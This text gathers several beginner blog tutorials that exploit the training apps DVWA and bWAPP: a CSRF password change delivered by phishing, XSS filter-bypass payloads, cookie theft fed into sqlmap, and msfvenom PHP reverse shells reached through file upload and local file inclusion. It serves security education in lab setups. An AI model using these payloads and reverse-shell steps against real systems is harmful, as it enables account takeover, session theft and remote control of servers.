CSRF Tutorial For Begineers in DVWA

in this article you will learn Cross-site request forgery attack. For CSRF tutorial I have targeted DVWA and try to bypass low security level.

Cross-site request forgery, also known as one-click attack or session riding and abbreviated as CSRF (sometimes pronounced sea-surf) or XSRF, is a type of malicious exploit of a website where unauthorized commands are transmitted from a user that the website trusts. Unlike cross-site scripting (XSS), which exploits the trust a user has for a particular site, CSRF exploits the trust that a site has in a user’s browser.

An attacker may forge a request to log the victim into a target website using the attacker’s credentials; this is known as login CSRF. Login CSRF makes various novel attacks possible; for instance, an attacker can later log into the site with his legitimate credentials and view private information.

Reference: en.wikipedia.org/wiki/Cross-site_request_forgery

 Let’s start!!!

By default the credential set for DVWA is admin: password. As you can see I have used them for login in DVWA.

Now set security level at low and select the bug cross site request forgery as current vulnerability.  Here you see the text fields are given for changing the password of the database for user admin.

Now open the view source page and copy the highlighted text.

Then paste above copied HTML code inside a text file.  If you are aware of HTML coding then it will be very to understand the following syntax inside the notepad which will create a form to reset the password of a web page. Now save the file as csrf.html

Now when you will open the csrf.html file it will look like the given below image where it contains the text field for password and a submit button.

Now again open csrf.html with notepad to edit the value inside the text field given for new password and confirm password. In following screenshot you can see I have given value= “hacker” as new password and confirm password. Then again save it with csrf.html

Now when again you will open csrf.html file you will find that the blank text field are given for password is get filled.

Now when you will click on change button the password will reset for that web page. This is all about how html form will work and from given screenshot you can read the sent GET request for changing password through URL. 

Since this tutorial is related to bypass low security in DVWA therefore we need to add target location inside the html form to make CSRF attack for changing the password for admin without his permission.

Now copy the URL as shown in the following image.

Again open csrf.html with notepad and replace # from above copied URL which will directly change the password of targeted location for user admin.

Here you can read the final syntax for html form to change the password for admin inside DVWA without his involvement.  Now send this crsf.html file to victim using social engineering or phishing technique to trap the victim for exploiting with CSRF attack.

When victim will open the csrf.html file and click on change button the password will get changed for admin inside DVWA.

From screenshot you can see without admin permission we have successfully changed his password.

Now let’s verify, as we know the previous credential was admin: password; here when I try to use them it shows the login failed.

Further when I try with admin: hacker as current credential, I login successfully inside DVWA. This was all about CSRF tutorial to bypass low security in DVWA.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

XSS Exploitation in DVWA (Bypass All Security)

In previous tutorial I have discussed cross site scripting attack and looked over the damage cause by it. Where I briefly explained the type of XSS vulnerability; now in this tutorial you will learn how to bypass both type of XSS vulnerability (store and reflected) in all three security levels if the web application is suffering from it.

Reflected Cross Site Scripting

Set security low

 Explore localhost IP in browser; now login with admin: password and select the reflected cross site scripting vulnerability from given list of vulnerabilities.

Now have a look over a small script which would generate an alert window. So in the given text field for “name” I will inject the script in the server.

<script>alert(“helllooo”)</script>

Browser will execute our script which generates an alert prompt as showing following screenshot.

In low security it will easily bypass the injected script when an attacker injects it in the text field given for “name” which should be not left empty according developer.

Set Security Medium

 In medium security if you visit to view source of its web page then you will find that the highlighted content has added an extra layer of security to the inserted input in text field given for “name” which will check for script tag to disable the java script.

str_replace — Replace all occurrences of the search string with the replacement string And if an attacker tries to inject a script using script tag, the string inside script will get replaced to blank space.

It could be considered as case sensitive because the given PHP script will check for <script> which can be replaced by <SCRIPT> or using other HTML tag to bypass medium security.

There are two ways either use <SCRIPT> tag or any other HTML element, write now I had used body tag to inject the string.

<body onload=alert(“XSS”)>

Above script is successfully injected and we have bypassed the medium security. You can see from given screenshot XSS prompt get opened using body tag.

Set Security High

 In high security the level of security increased where you can easily find preg-replace PHP function is used to perform regular expression to disable the java script.

Preg_replace – Searches string for matches to pattern and replaces them with replacement.

Now above technique will fail as you can see it will search for each and every valid input character for text field and replace invalid character into blank space.

To bypass high security level use element of HTML, as you can see I have use image source tag to generate the string inside the web server.

<img src=x onError=alert(‘xss’)>

From given below screenshot you see XSS alert prompt.

CONGRATS!!! We have successfully bypassed all three level of security.

 Stored Cross Site Scripting

 Set security low

Now have a look over a small script which would generate an alert window. So in the text area given for message I will inject the script which get store in the server.

<script>alert(“helllooo”)</script>

Now when user will visit this page to read our message his browser will execute our script which generates an alert prompt as showing following screenshot.

Since it get permanently stored in web application server therefore before switching to other two level of security you need to reset the data base.

Set Security Medium

 If you remember, in previous article we have used inspect element to change text area given for message length so that we might able to inject our script inside it. Repeat the same process to change the maximum length given text field of “name”.

Change maxlength=10 into maxlength=100”; which will be sufficient area for injecting the content of script.

Now type following content inside the text field given for “name”.

<body onload=alert(“XSS”)>

Remember do not leave message box empty.

Now when user will visit this page to read our message his browser will execute our script which generates an alert prompt as showing following screenshot.

Again you need to reset the data base.

Set security High

 Repeat the same process to change the max length of text field given for “name”.

Change maxlength=10 into maxlength=100”

Now type following content inside the text field given for “name”.

<img src=x onError=alert(‘xss’)>

Remember do not leave message box empty.

CONGRATS!!! We have successfully bypassed all three level of security.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

Stored XSS Exploitation in DVWA (Beginner Guide)

This article is written to bring awareness among all security researchers and developers so that they may be able to learn the level of damage cause by XSS attack if the web server is suffering from cross site scripting vulnerability.

Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into trusted web sites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. The end user’s browser has no way to know that the script should not be trusted, and will execute the script. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site. 

 Stored XSS (Persistent or Type I)

Stored XSS generally occurs when user input is stored on the target server, such as in a database, in a message forum, visitor log, comment field, etc. And then a victim is able to retrieve the stored data from the web application without that data being made safe to render in the browser. With the advent of HTML5, and other browser technologies, we can envision the attack payload being permanently stored in the victim’s browser, such as an HTML5 database, and never being sent to the server at all.

Refernce: owasp.org

Lets start!!!

Attacker: Kali Linux

Target: DVWA

 For this tutorial I had targeted DVWA and explore localhost IP in browser; now login with admin: password and select the stored cross site scripting vulnerbility from given list of vulnerbility.

Now have a look over a small script which would generate an alert window. So in the text area given for message I will inject the script which get store in the server.

<script>alert(XSS)</script>

 

Now when user will visit this page to read our message his browser will execute our script which generates an alert prompt as showing following screenshot.

This was a small demo to show how to inject any script if server is suffering from XSS and further you will learn what else an attacker can do to cause damage inside a web application server.

If attack is aware that the web server is having XSS then he might think to steal the web cookies which contain session Id therefore he will generate a script to fetch running cookies.

In following screenshot you can see I have injected the script to get web page cookies.

<script>alert(document.cookie)</script>

Here in given below image when I have executed the script I have successfully fetched the browser cookies and now further I will use this cookies for retrieving the data of web application server. 

SQL Injection with XSS

 It might be possible that the web application server has more than one vulnerabilities, let assume if it is also having SQL injection vulnerability then it become very easy for attacker to retrieve the data from its database using stolen cookies.

For example in DVWA I switch from XSS to SQL injection; now copy its URL with user ID=1.

From above we have browser cookie and target URL for making SQL injection attack. Now open the terminal in your kali Linux and use above cookie and URL inside the command of sqlmap as shown in screenshot

Sqlmap – u “http://192.168.1.8/dvwa/vulnerbilities/sqli/?id=1&submit=submit” –cookie=“security=low; PHPSESSID=r12pk67cuq3s7eo4iktb88sud2” –dbs –batch

Hence you can see it has fetched all present database names inside database system.

Gaining Shell Access with XSS

Now let assume if server is suffering from XSS as well as file uploading both vulnerabilities; in this case how an attacker would be able to cause harm to the web application server.

Firstly let’s prepare our malicious PHP file for uploading in web server. As we always use msfvenom for this purpose and then save the generated PHP codes in a text file as shell.php

Msfvenom –p php/meterpreter/reverse_tcp lhost=192.168.1.11 lport=4444 –f raw

Again I switched to file uploading vulnerability in DVWA to upload shell.php and from screenshot you can see our shell.php file is successfully uploaded now copy the highlighted path.

Start multi handler inside the metasploit framework.

Here the text area given for message length is not sufficient to inject our next script therefore make right click on window and select inspect element to view it’s given message length for text area.

Here you can see message length for text area is decided as “50”.

Change message length from “50 to 500” so that it becomes easy to inject our next script.

Now in following screenshot you can see I have injected the path of uploaded file in script which will get saved in the server. When user click on it to read the message he will execute our shell.php file which provide reverse connection on attacker machine.

<script>window.location=“http://192.168.1.8/dvwa/hackable/upload/shell.php”</script>

Here you can see as soon as script will execute it has shown meterpreter session for victim’s PC.

Meterpreter>sysinfo

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

File Upload Exploitation in bWAPP (Bypass All Security)

In this article you will learn how to bypass all three security level of unrestricted file upload inside the bWAPP and if you want to know more about the various kind of file uploading vulnerability read previous article that may help you to understand this article more clearly.

LOW SECURITY

Open the target IP in browser: 192.168.0.106/bWAPP/login.php. Enter user and password as bee and bug respectively.

Set security level low, from list box chooses your bug select Unrestricted File Upload now and click on hack.

Create PHP backdoor using msfvenom and start multi handler in the background; now from screenshot you can see I have browse meter.php for uploading as an image inside the web server.

When the image gets successfully uploaded on the web server it will send the link of directory where image is saved to view the uploaded image. Since we haven’t upload any real image therefore we will try to execute our PHP backdoor by making click on the link “here”.

When victim click the above link “here” we will get victim’s reverse connection through meterpreter session inside the metasploit framework.

From screenshot you can see metasploit session 1 is opened.

MEDIUM SECURITY

As the level of security is change so here we cannot able to perform same procedure as above. Although here you just need to change only the extension of your PHP backdoor to bypass medium security. If you notice the image given below here you will find that I have browse meter.php3 for uploading.

Now repeat the same step run multi handler at background and make click on the given link “here” to receive metrpreter session.

GREAT!!! From screenshot you can see metasploit session 2 is opened.

HIGH SECURITY

Now we have enter into high security where above two file uploading attack will get failed so here again you need to make some small changes  into the extension of PHP backdoor file for uploading it in the web server.

From screenshot you can read the file name high.php.png which I have browse for uploading.

Here our file is successfully uploaded now make right click on the link “here” to copy link location and keep multi handler running at the background.

To bypass high security of file uploading in bWAPP we need to switch the bug as well as security level.

Set security level low and choose the bug remote & local file Inclusion then click on hack.

Here the requested web page which suffering from RFI & LFI Vulnerability gets open. Where you will find a comment to select a language from the given drop down list, and when you click on go button the selected language file get included in URL.

Since I have uploaded the PHP backdoor shell in high security but execute that backdoor through low security with help of LFI vulnerability. Now just manipulate the following URL as shown in screenshot.

http://192.168.0.106/bWAPP/rlfi.php?language=lang_en.php&action=go into 192.168.0.106/bWAPP/rlfi.php?language=images/high.php.png

When above URL is executed in the browser you will get victim’s reverse connection inside metasploit.

Congrats!!! From screenshot you can see metasploit session 3 is opened.

Hence we have bypassed all three security level inside bWAPP

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

Related Posts Plugin for WordPress, Blogger...